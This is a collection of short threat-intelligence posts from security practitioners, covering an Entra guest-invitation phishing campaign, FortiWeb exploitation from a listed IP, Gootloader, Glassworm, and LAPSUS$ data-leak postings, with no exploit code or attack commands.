Actual threat intelligence! A few friends and I identified a new reverse phishing campaign leveraging Entra Guest User invitations.
This campaign was newly discovered and corroborated. I recommend reviewing organization email for these invitations.
Heads up if you're unfortunate enough to be an M365 / Entra shop. There is a TOAD / phishing campaign going on targeting M365 tenants and because the senders are also MS tenants, they tend to be allowed.
More on the meow attack. FWIW, I am attributing it to the threat actor known as @catsalad .
Anyone have some FortiShit to test something on?
https://x.com/DefusedCyber/status/1986544427121471513
⚠️Actor mass exploiting unknown Fortinet exploit (FortiWeb path traversal / API exploitation) from 107.152.41.19 🇺🇸 ( TZULO )
VirusTotal Detections 0/95 🟢
After the exploit, the actor attempted to login using the newly created username-credential pair 🔐
Huntress has published an article about Gootloader with an absolutely ridiculous amount of IoCs to hunt for, beyond an already excellent technical deep dive.
https://www.huntress.com/blog/gootloader-threat-detection-woff2-obfuscation
Raising the bar?
New UI to RansomLook.io
The open source project providing real-time ransomware intelligence.
Thanks to @F_kZ_ for the incredible work.
Someone asked me to hand-translate a publicly posted Chinese technical report about NSA shenanigans on the Chinese Center for Time-Keeping network. It took me a while, because it turns out translating technical corporatese from your third language is very hard when chronically sleep deprived, but it is done.
https://docs.google.com/document/d/1gk1fDLKrN3m5jOSk7QbpGL1SBcLvrm0FTN3H-5ZJZcY/edit?usp=sharing
High confidence of a data breach targeting the UK 🇬🇧 Government Administration sector. Alleged leak of Ministry of Justice court documents. #DataBreach #CyberSecurity #ThreatIntel
Quick question to the blue teamers out there:
What's your take on MITRE ATT&CK Tactics and Techniques? Do you find them useful? If yes, how and in what capacity do you use them? (To the extent that you can and want to share...)
If you could have tactics and techniques extracted from publicly available reports/articles, would that be useful? If yes, why?
(And imagine extracted not just by direct technique referencing, but also indirectly extracted through textual descriptions.)
GitHub User Compromised with Invisible Malware
Updates on Glassworm.
I think a whole bunch of orgs probably need to start rotating certificates and such. #threatintel
The Red Hat Consulting LAPSUS$ saga continues - in the past hour they've released a 2.2gb ZIP file.
The Scattered Lapsus$ Hunters portal has 25 victim orgs posted so far, they're an average of about one every 10 minutes.
I've talked to one of the victim orgs - their sample data is indeed from their Salesforce instance. Gonna be a long weekend for a bunch of orgs. Each org also has sample downloads up too.